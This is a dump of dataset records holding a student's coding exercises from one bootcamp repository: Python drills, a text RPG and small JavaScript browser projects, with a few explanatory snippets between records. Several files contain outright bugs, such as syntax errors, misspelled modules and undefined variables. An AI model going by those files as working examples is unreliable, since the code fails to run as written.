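print(Counter(text).most_common(2))  # [('i', 4), ('s', 4)]
```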
{
"alpha_fraction": 0.4161073863506317,
"alphanum_fraction": 0.46979865431785583,
"avg_line_length": 8.3125,
"blob_id": "3b90dfab81d62de0b42800257c088359c5a74c6d",
"content_id": "39d3a2e8686609f9ab31dbba8da8354a8d9deb3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 16,
"path": "/week-4/practice/29.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ad = [3, 4, 5, 6, 7]\ni = 0\nsumma = 0\n\nwhile i < len(ad):\n summa += ad[i]\n i += 1\n\nprint(summa)\n\n---\n\nfor n in ad:\n summa += n\n\nprint(summa)\n"
},
{
"alpha_fraction": 0.6990185379981995,
"alphanum_fraction": 0.7044711112976074,
"avg_line_length": 20.325580596923828,
"blob_id": "53457ddb45fde5942a95644fc87040f0a842179b",
"content_id": "0bb8dd4a4c691a66933b8acbf10613ef242b2e5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 917,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 43,
"path": "/week-7/project_gallery/gallery.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar nextbutton = document.querySelector(\".next\");\nvar previousbutton = document.querySelector(\".previous\");\nvar currentpicture = document.querySelector(\".currentpicture\");\n\n\nvar pictures = [\n \"pictures/first.jpg\",\n \"pictures/ballett.jpg\",\n \"pictures/jazz.jpg\",\n \"pictures/thai.jpg\"\n];\n\nvar currentIndex = 0;\n\nfunction nextPicture() {\n currentIndex++;\n if (currentIndex > pictures.length -1) {\n currentIndex = 0;\n }\n currentpicture.setAttribute(\"src\", pictures[currentIndex]);\n};\n\nfunction previousPicture() {\n currentIndex--;\n if (currentIndex === -1) {\n currentIndex = pictures.length -1;\n }\n currentpicture.setAttribute(\"src\", pictures[currentIndex]);\n};\n\nnextbutton.addEventListener(\"click\", function() {\n nextPicture();\n});\n\npreviousbutton.addEventListener(\"click\", function() {\n previousPicture();\n});\n\ncurrentpicture.addEventListener(\"click\", function() {\n nextPicture();\n});\n"
},
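gallery.js wraps the picture index with explicit boundary checks in both directions; modular arithmetic expresses the same wraparound in one line. A small Python sketch of that alternative (not code from the repo):

```python
# Sketch of the wraparound in gallery.js, using modular arithmetic
# instead of explicit boundary checks.
pictures = ["first.jpg", "ballett.jpg", "jazz.jpg", "thai.jpg"]

def step(current_index, delta):
    # Python's % is non-negative for a positive modulus, so this wraps
    # in both directions; in JavaScript you would add pictures.length
    # first, because % there can return a negative result.
    return (current_index + delta) % len(pictures)

assert step(3, +1) == 0  # next from the last picture wraps to the first
assert step(0, -1) == 3  # previous from the first wraps to the last
```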
{
"alpha_fraction": 0.6128048896789551,
"alphanum_fraction": 0.6189024448394775,
"avg_line_length": 12.666666984558105,
"blob_id": "6a93f89deb1b1592ad6787ae9bdb1fc7c156fa04",
"content_id": "2f75e448386a66e92ddc013f6ee3816c67ade4e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 24,
"path": "/week-7/wednesday/func.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction greet(name) {\n console.log(\"Hello \", name);\n}\n\ngreet(\"Dorka\");\n\n\nvar koszontes = greet;\nkoszontes(\"Geza\");\n\nvar print = console.log;\nprint(\"svbb\")\n\n\nfunction greeter(name, log) {\n log (\"csako\", name);\n}\ngreeter(\"lajcsi\", print);\n\n\nvar add = function (a, b) { return(a + b); } ;\nconsole.log(add(1, 2));\n"
},
{
"alpha_fraction": 0.6140350699424744,
"alphanum_fraction": 0.6140350699424744,
"avg_line_length": 22.15625,
"blob_id": "e0fbea6f9aa16eb5ad49bd1a54ce0d5ff2aa22c1",
"content_id": "46b74107325ec5a8012009644a7a15d042eb6df0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 32,
"path": "/week-4/practice/42.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "filename = \"alma.txt\"\n\ndef read_and_add_a(filename):\n read_file = open(filename)\n file_content = read_file.readlines()\n read_file.close()\n output = \"\"\n for line in file_content:\n print(\"a\" + line.rstrip())\n\nprint(read_and_add_a(filename))\n\n\ndef read_and_add_a(filename):\n read_file = open(filename)\n file_content = read_file.read()\n read_file.close()\n for line in file_content.split(\"\\n\"):\n print(\"a\" + line)\n\nread_and_add_a(filename)\n\ndef read_and_add_a(filename):\n read_file = open(filename)\n file_content = read_file.read()\n read_file.close()\n output = \"\"\n for line in file_content.split(\"\\n\"):\n output += \"a\" + line + \"\\n\"\n return output\n\nprint(read_and_add_a(filename))\n"
},
{
"alpha_fraction": 0.6268292665481567,
"alphanum_fraction": 0.6439024209976196,
"avg_line_length": 19.5,
"blob_id": "da6d3983742863834b29534dc2c03a621a8583cf",
"content_id": "42ddc52d260390f7538d0a11e00bde0cb35f6a14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 20,
"path": "/week-5/tuesday/decorator_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom decorator import Rusty\n\nclass RustyTest(unittest.TestCase):\n def test_rusty_effect(self):\n weapon = Rusty(TestWeapon)\n self.assertEqual(5, weapon.damage())\n self.assertEqual(15, RustyHace().damage)\n\n\nclass TestWeapon():\n def damage(self):\n return 10\nclass TestHace:\n def damage(self):\n return 30\n\n\nif __name__== \"__main__\":\n untittest.main()\n"
},
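decorator.py is not included in this dump; the expected values in the test above (10 → 5 and 30 → 15) suggest that Rusty wraps a weapon object and halves its damage. A minimal sketch of such a decorator, under that assumption:

```python
# Minimal sketch, assuming from the test's expected values that a
# rusty weapon deals half the damage of the weapon it wraps.
class Rusty:
    def __init__(self, weapon):
        self.weapon = weapon

    def damage(self):
        return self.weapon.damage() // 2
```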
{
"alpha_fraction": 0.5268816947937012,
"alphanum_fraction": 0.5537634491920471,
"avg_line_length": 10.625,
"blob_id": "9d493e91230d8489bd4591e1459831bda2095ffb",
"content_id": "78ee3cd61c3bfdfe32fa0ef4836d088682524493",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 186,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 16,
"path": "/week-4/practice/32.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ag = \"kuty\"\n\ndef my_word(string):\n return string + \"a\"\n\nag = my_word(ag)\nprint(ag)\n\n\n\nag2 = [\"cic\", \"kacs\", \"alm\"]\n\nfor i in range(len(ag2)):\n ag2[i] = my_word(ag2[i])\n\nprint(ag2)\n"
},
{
"alpha_fraction": 0.5853658318519592,
"alphanum_fraction": 0.5934959053993225,
"avg_line_length": 29.75,
"blob_id": "580190482a4f298efbace7d82ed9ab652cd5f102",
"content_id": "f893ad2ee66f287f0a29cc708b4fa4ae392f2a92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 4,
"path": "/week-5/tuesday/observer2.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class BattleField:\n def __notify__(self, type, warrior):\n if type == \"movement\" and\n warrior.movement(-5)\n"
},
{
"alpha_fraction": 0.4600938856601715,
"alphanum_fraction": 0.48356807231903076,
"avg_line_length": 9.142857551574707,
"blob_id": "695aaf8e6615091cef9a43cc50c5f116b2e34e4e",
"content_id": "547786d5339af97b19d46b3b57c6a7e842025eae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 213,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 21,
"path": "/week-7/tuesday/while.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a = 0;\n\nwhile (a <= 10) {\n console.log(a++);\n if (a === 4) {\n break\n }\n}\n\n\n\n\nvar array = [\"kacsa\", \"malac\", \"cica\"]\nvar j = 0;\n\nwhile (j < array.length) {\n console.log(array[j]);\n j++\n}\n"
},
{
"alpha_fraction": 0.5393586158752441,
"alphanum_fraction": 0.6064140200614929,
"avg_line_length": 25.384614944458008,
"blob_id": "d17d8cc910185f821bad626e354e9564b6571f85",
"content_id": "605f81697f450ab510f7718dbffda2e588a465ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/week-5/wednesday/funct1_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nimport func1\n\nclass TestFunc(unittest.TestCase):\n def test_apply_function(self):\n array = [1, 2, 3,]\n self.assertEqual(func1.adder(array), [2, 3, 4])\n\n def test_filter_array(self):\n array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n self.assertEqual(func1.filterArray(array), [0,3,6,9])\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5080645084381104,
"avg_line_length": 23.799999237060547,
"blob_id": "1c989ae2156c2d4fe369bc9f3bcdd61e725d85e1",
"content_id": "9f65ed0057386c89439c59da2d189a388f26e056",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/week-3/wednesday/count.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_string):\n self.string = my_string\n\n def count_string(self, char):\n count = 0\n for i in self.greet:\n if char == i\n count =+1\n return count\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6293706297874451,
"avg_line_length": 22.66666603088379,
"blob_id": "0be115b307ddb92293d146196579a36dab45398c",
"content_id": "9c0a63177b30e7143170f549271a8f692df7b6d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 6,
"path": "/week-5/wednesday/func1.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\ndef adder(array):\n return list(map(lambda x : x+1, array))\n\n\ndef filterArray(array):\n return list(filter(lambda x : x % 3 == 0, array))\n"
},
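func1.py covers `map` and `filter`; the third classic higher-order function, `reduce`, lives in `functools` in Python 3. A small companion sketch (not part of the original file):

```python
from functools import reduce

def sum_array(array):
    # fold the list into a single value; 0 is the initial accumulator
    return reduce(lambda acc, x: acc + x, array, 0)

print(sum_array([1, 2, 3]))  # 6
```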
{
"alpha_fraction": 0.5907173156738281,
"alphanum_fraction": 0.594936728477478,
"avg_line_length": 22.700000762939453,
"blob_id": "4bad2c6271a8ff158f86ac129282845ed2402a42",
"content_id": "f20e417635baef9bc60da00498e02b941698a90e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/week-4/practice/38.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "names = [\"Zakarias\", \"Hans\", \"Otto\", \"Ole\"]\n\ndef shortest_name(my_name):\n output = my_name[0]\n for string in my_name:\n if len(output) > len(string):\n output = string\n return output\n\nprint(shortest_name(names))\n"
},
{
"alpha_fraction": 0.5628140568733215,
"alphanum_fraction": 0.5979899764060974,
"avg_line_length": 8.949999809265137,
"blob_id": "43696204ca976d3be327d481c30e861ba97760ff",
"content_id": "69a700d8a35f12e63f1cbeaa689d161278670874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 20,
"path": "/week-7/tuesday/scope.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a = 123;\n\nfunction printA() {\n console.log(a);\n a = 523;\n}\n\nprintA();\nconsole.log(a);\n\n\nfunction printLocalA() {\n var a = 9;\n console.log(a);\n}\n\nprintLocalA();\nconsole.log(a);\n"
},
{
"alpha_fraction": 0.44111350178718567,
"alphanum_fraction": 0.4860813617706299,
"avg_line_length": 15.678571701049805,
"blob_id": "3dde170c7651ff048ae005c1a621f5613b327dd5",
"content_id": "a3a92a7e2a7412a77336c646ebbbca47b9f5ed82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 467,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 28,
"path": "/week-4/practice/car.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "lada = {\n \"color\": \"red\",\n \"type\": \"spaceX\",\n \"km\": \"1200km\"\n}\n\n\ntesla = {\n \"color\": \"blue\",\n \"type\": \"Tesla S\",\n \"km\": \"100km\"\n}\ndef initCar(color, type, km)\n car = (\"color\": \"\", \"type\", \"\", \"km\": 0)\n car[ \"color\" ] = color\n car[ \"type\" ] = type\n car[ \"km\" ] = km\n return car\n\n\ndef ride(car, km):\n car[ \"km\"] == km\n\nlada = initCar (\"red\", \"Lada 200\", 200)\ntesla = initCar (\"blue\", \"Xspam\", 2500)\n\nride(tesla, 220)\nprint(tesla)\n"
},
{
"alpha_fraction": 0.6812400817871094,
"alphanum_fraction": 0.6987281441688538,
"avg_line_length": 20.32203483581543,
"blob_id": "19ca350dede16bce3dc06c025a5f64053621d310",
"content_id": "0693666e3737ba7028d3f9dd74442cfe2191acfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 59,
"path": "/week-8/tuesday/candies/candies.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar createCandie = document.querySelector(\".candiebutton\");\nvar buyLollipop = document.querySelector(\".lollibutton\");\nvar currentCandy = 500;\nvar currentLolli = 0;\nvar timecount = 0;\n\nfunction updateCandies() {\n document.querySelector(\".candies\").innerHTML=(\"Your candies: \" + currentCandy);\n};\n\nfunction updateLollies() {\n document.querySelector(\".lollipops\").innerHTML=(\"Your lollipops: \" + currentLolli);\n};\n\nfunction updateCount() {\n document.querySelector(\".candiespersec\").innerHTML=(\"Candy/Second: \" + timecount);\n};\n\nfunction addCandie() {\n currentCandy++;\n updateCandies();\n if(currentCandy >= 10000) {\n alert(\"YoU aRe tHe WiNnEeEr!\");\n restartGame();\n }\n};\n\nfunction buyLolli() {\n if (currentCandy >= 10) {\n currentCandy -= 10;\n currentLolli++;\n updateLollies();\n updateCandies();\n }\n};\n\nfunction restartGame() {\n currentCandy = 0;\n currentLolli = 0;\n updateLollies();\n updateCandies();\n};\n\nfunction increasespeed() {\n timecount = Math.floor(currentLolli / 10)\n currentCandy += timecount;\n updateCandies();\n updateCount();\n};\n\nfunction setSpeed() {\nsetInterval(increasespeed, 1000);\n};\n\ncreateCandie.addEventListener(\"click\", addCandie);\nbuyLollipop.addEventListener(\"click\", buyLolli);\nsetSpeed();\n"
},
{
"alpha_fraction": 0.6677820086479187,
"alphanum_fraction": 0.6711280941963196,
"avg_line_length": 24.204818725585938,
"blob_id": "db5138c5a6bfbd2bd08ca37db24842311318d7c5",
"content_id": "f38c003c8750fbf3a905a071bc82bf05800d6e43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2092,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 83,
"path": "/week-8/project_todo/public/heraku.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nvar url = 'https://mysterious-dusk-8248.herokuapp.com/todos';\nvar listItem = document.querySelector(\"ul\");\nvar newItemInput = document.querySelector('.item-input');\nvar addNewItemInput = document.querySelector('.addnewitem');\nvar deleteButton = document.querySelector('.deletebutton');\n\n\nlistItems(updateHtml);\n\n\nfunction startRequest(text) {\n postItemToServer(text, textDOM)\n}\n\nfunction listItems(callback) {\n var req = new XMLHttpRequest();\n req.open('GET', url);\n req.send();\n req.onreadystatechange = function () {\n if (req.readyState === 4) {\n var res = JSON.parse(req.response);\n return callback(res);\n }\n };\n}\n\nfunction postItemToServer(text, callback) {\n var req = new XMLHttpRequest();\n req.open('POST', url);\n req.setRequestHeader('Content-Type', 'application/json');\n req.send(JSON.stringify({\"text\": text}));\n req.onreadystatechange = function () {\n if (req.readyState === 4) {\n var res = JSON.parse(req.response);\n return callback(res);\n }\n };\n}\n\nfunction deleteItem(id, callback) {\n var req = new XMLHttpRequest();\n req.open('DELETE', url + '/' + id);\n req.send();\n req.onreadystatechange = function () {\n if (req.readyState === 4) {\n var res = JSON.parse(req.response);\n return callback(res);\n }\n }\n};\n\nfunction deleteCallBack(res) {\n document.getElementById(res.id).remove();\n}\n\n\ndeleteButton.addEventListener(\"click\", function() {\n deleteItem(addNewItemInput.value, deleteCallBack);\n});\n\nfunction updateHtml(res) {\n res.forEach(function(item) {\n if (item.text !== \"\") {\n var newitem = document.createElement(\"li\");\n newitem.innerText = item.id + ' ' + item.text;\n newitem.setAttribute(\"id\", item.id)\n listItem.appendChild(newitem);\n }\n })\n};\n\nfunction textDOM(response) {\n var output = document.querySelector(\"li\");\n output.innerText = response.id + \" \" + response.text;\n output.setAttribute(\"id\", response.text)\n document.body.appendChild(output)\n};\n\naddNewItemInput.addEventListener('click', function () {\n postItemToServer(newItemInput.value, textDOM);\n});\n"
},
{
"alpha_fraction": 0.4585365951061249,
"alphanum_fraction": 0.4707317054271698,
"avg_line_length": 18.5238094329834,
"blob_id": "8d4e293aff076a48bfd92a716ad6b1d4f5739f14",
"content_id": "df8402e413c7e0ed27380cb31087f5bf6a5a57e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 21,
"path": "/week-5/tuesday/fibo.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Fibo:\n def __init__(self, current):\n self.count = count\n self.a = 0\n self.b = 1\n self.i = 0\n\n def __next__(self):\n if self.i == self.count:\n return StopIteration()\n\n self.i += 1\n curr = self.a\n self.a, self.b = self.a + self.b, self.a\n return curr\n\n def __iter__(self):\n return self\n\nfor n in Fibo(5)\n print(n)\n"
},
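fibo.py implements the iterator protocol by hand with `__iter__`/`__next__`; a generator function yields the same sequence with far less bookkeeping. An equivalent sketch:

```python
def fibo(count):
    # local variables carry the state between yields, so no explicit
    # __iter__/__next__ methods or StopIteration handling are needed
    a, b = 0, 1
    for _ in range(count):
        yield a
        a, b = b, a + b

for n in fibo(5):
    print(n)  # 0 1 1 2 3
```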
{
"alpha_fraction": 0.5403726696968079,
"alphanum_fraction": 0.5776397585868835,
"avg_line_length": 15.100000381469727,
"blob_id": "3a18cdcf47872329c0aae08ec208aee3c61f9017",
"content_id": "3e464fa80e00d8b796382b1fc7d4defa983e9c42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 10,
"path": "/week-4/practice/33.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [4, 5, 6, 7, 8]\n\ndef list(my_list):\n output = 0\n for i in my_list:\n output += i\n return output\n\nnumbers = list(numbers)\nprint(numbers)\n"
},
{
"alpha_fraction": 0.550869345664978,
"alphanum_fraction": 0.5599154233932495,
"avg_line_length": 33.88524627685547,
"blob_id": "6b79b331e617dce30f05f81d4165a057890ebcc0",
"content_id": "adc510cf0b52d11e9e839068fe5fb4d841002bed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8512,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 244,
"path": "/week-6/project/menu.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nclass MenuItem():\n def __init__(self, num, name, action):\n self.num = num\n self.name = name\n self.action = action\n\nclass Menu():\n def __init__(self, items):\n self.items = items\n\n def choose(self, number):\n for item in self.items:\n if item.num == number:\n return item.action()\n\n def printMenu(self):\n for item in self.items:\n print(item.num, item.name)\n\n def user_input(self):\n user_input = int(input(\"Choose your faith! \" + \"\\n\"))\n print('\\033c')\n try:\n if user_input == \"\" or user_input > len(menu.items):\n raise ValueError\n except:\n print(\"Hey, that\\'s not an option!\")\n return user_input\n\n def print_and_choose_menu_input(self):\n self.printMenu()\n self.choose(self.user_input())\n\nclass Character():\n def __init__(self, name = None, dexterity = 0, hp = 0, luck = 0, potion = None):\n self.name = name\n self.dexterity = dexterity\n self.hp = hp\n self.luck = luck\n self.potion = potion\n\n def input_name(self):\n print('\\033c')\n self.name = input(\"Tell me your name, young hero! \" + \"\\n\")\n return self.name\n\n def dexterity_rollstat(self):\n self.dexterity = randint(1, 6) + 6\n return(print(\"dexterity points: \" , self.dexterity))\n\n def health_rollstat(self):\n self.hp = randint(2, 12) + 12\n return(print(\"health points: \" , self.hp))\n\n def luck_rollstat(self):\n self.luck = randint(1, 6) + 6\n return(print(\"luck points: \" , self.luck, \"\\n\"))\n\n def roll_dex_hp_luck_stats(self):\n text = input(\"Press Enter to roll the dice for the basic stats (dexterity, hp, luck)! \" + \"\\n\")\n self.dexterity_rollstat()\n self.health_rollstat()\n self.luck_rollstat()\n roll_stats()\n\n def choose_potion(self, potion):\n potion_menu(potion)\n\n def print_character_stat(self):\n print(self.name + \" \" + \"stats: \" + \"\\n\")\n print(\"Dexterity points: \", self.dexterity)\n print(\"Health points: \", self.hp)\n print(\"Luck points: \", self.luck)\n\nclass Opponent():\n def __init__(self, name = \"Sanyi\", hp = 0, dexterity = 0):\n self.name = name\n self.hp = hp\n self.dexterity = dexterity\n\n def opp_dexterity_rollstat(self):\n self.dexterity = randint(1, 6)\n return(\"dexterity points: \" , self.dexterity)\n\n def opp_health_rollstat(self):\n self.hp = randint(2, 12)\n return(\"health points: \" , self.hp)\n\n def print_opp_stat(self):\n self.opp_dexterity_rollstat()\n self.opp_health_rollstat()\n print(self.name + \" \" + \"stats: \" + \"\\n\")\n print(\"Dexterity points: \", self.dexterity)\n print(\"Health points: \", self.hp)\n\n def print_opp_and_char_stats(self):\n print(\"Test your Sword in a test fight! 
\" + \"\\n\")\n print(new_player.print_character_stat(), \"\\n\")\n print(self.print_opp_stat(), \"\\n\")\n strike_menu()\n\nclass Fight():\n def __init__(self, character_strike = None, opponent_strike = None):\n self.character_strike = character_strike\n self.opponent_strike = opponent_strike\n\n def current_dex(self):\n strike_dex_char = randint(2, 12)\n strike_dex_opp = randint(2, 12)\n self.character_strike = (new_player.dexterity + strike_dex_char)\n self.opponent_strike = (enemy.dexterity + strike_dex_opp)\n print(new_player.name, \"dexterity during the strike\" , self.character_strike)\n print(enemy.name, \"dexterity during the strike\" , self.opponent_strike, \"\\n\")\n\n def after_strike(self):\n if self.character_strike > self.opponent_strike:\n enemy.hp -= 2\n print(\"OMG, you hit the f*cking MONSTER!!\" , \"\\n\" , \"It has only\" , enemy.hp , \"hp points left\")\n else:\n new_player.hp -= 2\n print(\"Sorry buddy, the f*cking Monster hit you!\"\"\\n\" , \"You have\" , new_player.hp , \"hp points left\")\n\n def is_alive(self):\n if new_player.hp <= 0:\n print(\"You\\'re dead. I think this whole hero stuff is not your thing...Or you can start again and try not to be a bitch!\")\n elif enemy.hp <= 0:\n print(\"YOU\\'VE JUST KILLED THE BEAST! F*cking amazing! I think your job is done here.\")\n else:\n pass\n\n def strike(self):\n self.current_dex()\n self.after_strike()\n print(\"\\n\")\n self.is_alive()\n after_strike_menu()\n\n def try_luck(self):\n random_luck = randint(2, 12)\n if new_player.luck < random_luck and self.character_strike < self.opponent_strike:\n new_player.hp -= 3\n print(\"You have no luck, you have lost 3 healt points\")\n strike_menu()\n elif new_player.luck >= random_luck and self.character_strike < self.opponent_strike:\n new_player.hp -= 1\n new_player.luck -= 1\n print(\"You are lucky\")\n strike_menu()\n elif new_player.luck < random_luck and self.character_strike > self.opponent_strike:\n new_player.hp -= 1\n print(\"You have no luck\")\n strike_menu()\n elif new_player.luck >= random_luck and self.character_strike > self.opponent_strike:\n new_player.hp -= 4\n new_player.luck -= 1\n print(\"This is luck!\")\n strike_menu()\n\ndef exit_game():\n pass\n\ndef after_strike_menu():\n after_strike_menu = Menu([\n MenuItem(1, \"Continue\", fight.strike),\n MenuItem(2, \"Try your luck\", fight.try_luck),\n MenuItem(3, \"Retreat\", None),\n MenuItem(4, \"Quit\", quit_game)\n ])\n after_strike_menu.print_and_choose_menu_input()\n\ndef strike_menu():\n strike_menu = Menu([\n MenuItem(1, \"Strike\", fight.strike),\n MenuItem(2, \"Retreat\", None),\n MenuItem(3, \"Quit\", quit_game)\n ])\n strike_menu.print_and_choose_menu_input()\n\ndef begin_game_menu():\n begin_game_menu = Menu([\n MenuItem(1, \"Begin\", enemy.print_opp_and_char_stats),\n MenuItem(2, \"Save\", None),\n MenuItem(3, \"Quit\", quit_game)\n ])\n new_player.print_character_stat()\n begin_game_menu.print_and_choose_menu_input()\n\ndef potion_chooser():\n potions = Menu([\n MenuItem(1, \"Potion of Health\", lambda: new_player.choose_potion(\"Potion of Health\")),\n MenuItem(2, \"Potion of Dexterity\", lambda: new_player.choose_potion(\"Potion of Dexterity\")),\n MenuItem(3, \"Potion of Luck\", lambda: new_player.choose_potion(\"Potion of Luck\"))\n ])\n potions.print_and_choose_menu_input()\n\ndef potion_menu(potion):\n print(\"Your selected potion is: \" + potion + \"\\n\")\n potion_menu = Menu([\n MenuItem(1, \"Reselect the Potion\", potion_chooser),\n MenuItem(2, \"Continue\", begin_game_menu),\n 
MenuItem(3, \"Quit\", quit_game)\n ])\n potion_menu.print_and_choose_menu_input()\n\ndef roll_stats():\n roll_stats_menu_items = Menu([\n MenuItem(1, \"Re-roll stats\", new_player.roll_dex_hp_luck_stats),\n MenuItem(2, \"Continue\", potion_chooser),\n MenuItem(3, \"Save\", None),\n MenuItem(4, \"Quit\", quit_game)\n ])\n roll_stats_menu_items.print_and_choose_menu_input()\n\ndef quit_game():\n quit_game_menu_items = Menu([\n MenuItem(1, \"Save and Quit\", exit_game),\n MenuItem(2, \"Quit without save\", exit_game),\n MenuItem(3, \"Resume\", new_game_action)\n ])\n quit_game_menu_items.print_and_choose_menu_input()\n\ndef new_game_action():\n new_game_name_items = Menu([\n MenuItem(1, \"Re-enter name\", new_player.input_name),\n MenuItem(2, \"Continue\", new_player.roll_dex_hp_luck_stats),\n MenuItem(3, \"Save\", None),\n MenuItem(4, \"Quit\", quit_game)\n ])\n new_player.input_name()\n new_game_name_items.print_and_choose_menu_input()\n\nmenu_items = [\n MenuItem(1, 'New Game', new_game_action),\n MenuItem(2, 'Load Game', None),\n MenuItem(3, 'Exit Game', quit_game)\n ]\n\nmenu = Menu(menu_items)\nnew_player = Character()\nenemy = Opponent()\nfight = Fight()\nmenu.print_and_choose_menu_input()\n"
},
{
"alpha_fraction": 0.5765982866287231,
"alphanum_fraction": 0.5874547362327576,
"avg_line_length": 19.725000381469727,
"blob_id": "434a76a3742b0a701b19200c90815f0088c0bbf5",
"content_id": "44783a3bfedbd42b00dd8faa46a0f66f6ad58b78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 829,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 40,
"path": "/week-5/tuesday/observer.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Warrior:\n def __init__(self):\n self.companions = []\n self.hp = 100\n\n def join(self, companion):\n self.companion.append(companion)\n\n def strike(self, opponent):\n opponent.inflict_damage(10)\n\n def inflict_damage(self, damage):\n self.hp -= damage\n for companion in self.companion:\n companion.notify(\"damage\", self)\n\n def heal(self):\n self.hp = hp\n\n def cursed(self, opponent):\n opponent.join(Cursed())\n\nclass Healer:\n def __notify__(self, type, warrior):\n if type == \"damage\":\n warrior.heal(10)\n\nclass Cursed:\n def __notify__(self, type, warrior):\n if type == \"cursed\"\n warrior.heal(-10)\n\nrabbit = Warrior()\nwolf = Warrior()\nshaman = Healer()\n\nrabbit.join(shaman)\n\nwolf.strike(rabbit)\nprint(rabbit, hp)\n"
},
{
"alpha_fraction": 0.48399999737739563,
"alphanum_fraction": 0.4880000054836273,
"avg_line_length": 22.700000762939453,
"blob_id": "c1bb651a6ffcc7392872bea0e4efaf9eff8187f2",
"content_id": "08d35323712b59d5aa3cf6c8eeb1f47b5e5f590f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/week-3/wednesday/list.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_string):\n self.string = my_string\n\n def average(self):\n summ = 0\n for i in self.string:\n summ = summ + i\n summ = summ / x\n return summ\n \n"
},
{
"alpha_fraction": 0.546875,
"alphanum_fraction": 0.5703125,
"avg_line_length": 14.058823585510254,
